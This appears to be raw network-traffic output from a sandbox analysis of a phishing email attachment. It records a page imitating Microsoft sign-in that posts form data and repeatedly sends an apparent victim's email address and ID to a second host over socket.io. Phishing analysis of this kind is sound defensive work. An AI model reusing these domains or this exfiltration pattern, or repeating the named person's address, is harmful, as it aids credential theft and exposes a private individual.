            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kwiktestaust.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kwiktestaust.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://kwiktestaust.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kwiktestaust.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: kwiktestaust.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /o/jsv.js HTTP/1.1Host: kwiktestaust.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cid=05688cc8bbdbb0122f88552d85978beb
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kwiktestaust.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.1.1/webfonts/fa-brands-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kwiktestaust.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UtDRYDSeH2uSZlR&MD=1X3GNSgS HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: kwiktestaust.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8Mnmw HTTP/1.1Host: grastoonm3vides.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Auth_UID: USER21102024U52102117Session_Email: akash.desai@lcatterton.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://kwiktestaust.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kwiktestaust.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UtDRYDSeH2uSZlR&MD=1X3GNSgS HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8Ms_L HTTP/1.1Host: grastoonm3vides.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Auth_UID: USER21102024U52102117Session_Email: akash.desai@lcatterton.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://kwiktestaust.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kwiktestaust.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8Ms_L HTTP/1.1Host: grastoonm3vides.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8MyYE HTTP/1.1Host: grastoonm3vides.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Auth_UID: USER21102024U52102117Session_Email: akash.desai@lcatterton.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://kwiktestaust.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kwiktestaust.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8MyYE HTTP/1.1Host: grastoonm3vides.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=YmxoENE2iMzP-htfAAB5 HTTP/1.1Host: grastoonm3vides.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://kwiktestaust.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 0NXt5/bEBwva7uNJuqbrDA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8MzQV&sid=YmxoENE2iMzP-htfAAB5 HTTP/1.1Host: grastoonm3vides.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Auth_UID: USER21102024U52102117Session_Email: akash.desai@lcatterton.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://kwiktestaust.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kwiktestaust.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8MzQU&sid=YmxoENE2iMzP-htfAAB5 HTTP/1.1Host: grastoonm3vides.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8MzQV&sid=YmxoENE2iMzP-htfAAB5 HTTP/1.1Host: grastoonm3vides.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8N4dY HTTP/1.1Host: grastoonm3vides.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Auth_UID: USER21102024U52102117Session_Email: akash.desai@lcatterton.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://kwiktestaust.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kwiktestaust.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8N4dY HTTP/1.1Host: grastoonm3vides.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=YouvQDKT6G9okB_XAAB8 HTTP/1.1Host: grastoonm3vides.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://kwiktestaust.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: W6GkVbbi1yF8b7RAtgXBag==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8NA6B HTTP/1.1Host: grastoonm3vides.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Auth_UID: USER21102024U52102117Session_Email: akash.desai@lcatterton.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://kwiktestaust.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kwiktestaust.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8NA6B HTTP/1.1Host: grastoonm3vides.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=BbP6iaRyNQn3rw9FAAB_ HTTP/1.1Host: grastoonm3vides.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://kwiktestaust.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 8l3lo2NUO79Z3xQam31puQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8NArj&sid=BbP6iaRyNQn3rw9FAAB_ HTTP/1.1Host: grastoonm3vides.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Auth_UID: USER21102024U52102117Session_Email: akash.desai@lcatterton.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://kwiktestaust.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kwiktestaust.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: kwiktestaust.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
            Source: global trafficDNS traffic detected: DNS query: www.w3schools.com
            Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
            Source: global trafficDNS traffic detected: DNS query: grastoonm3vides.com
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: unknownHTTP traffic detected: POST /o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw== HTTP/1.1Host: kwiktestaust.comConnection: keep-aliveContent-Length: 139351Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://kwiktestaust.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cid=05688cc8bbdbb0122f88552d85978beb
            Source: chromecache_89.2.dr, chromecache_94.2.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.
            Source: chromecache_89.2.dr, chromecache_94.2.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e3281710
            Source: #U25b6#Ufe0fVmail__00_15.htmlString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js
            Source: chromecache_70.2.drString found in binary or memory: https://fontawesome.com
            Source: chromecache_70.2.drString found in binary or memory: https://fontawesome.com/license/free
            Source: chromecache_89.2.dr, chromecache_94.2.drString found in binary or memory: https://google.com
            Source: chromecache_83.2.dr, chromecache_91.2.drString found in binary or memory: https://i.imgur.com/xA8aaXN.png
            Source: chromecache_89.2.dr, chromecache_94.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.pn
            Source: chromecache_94.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
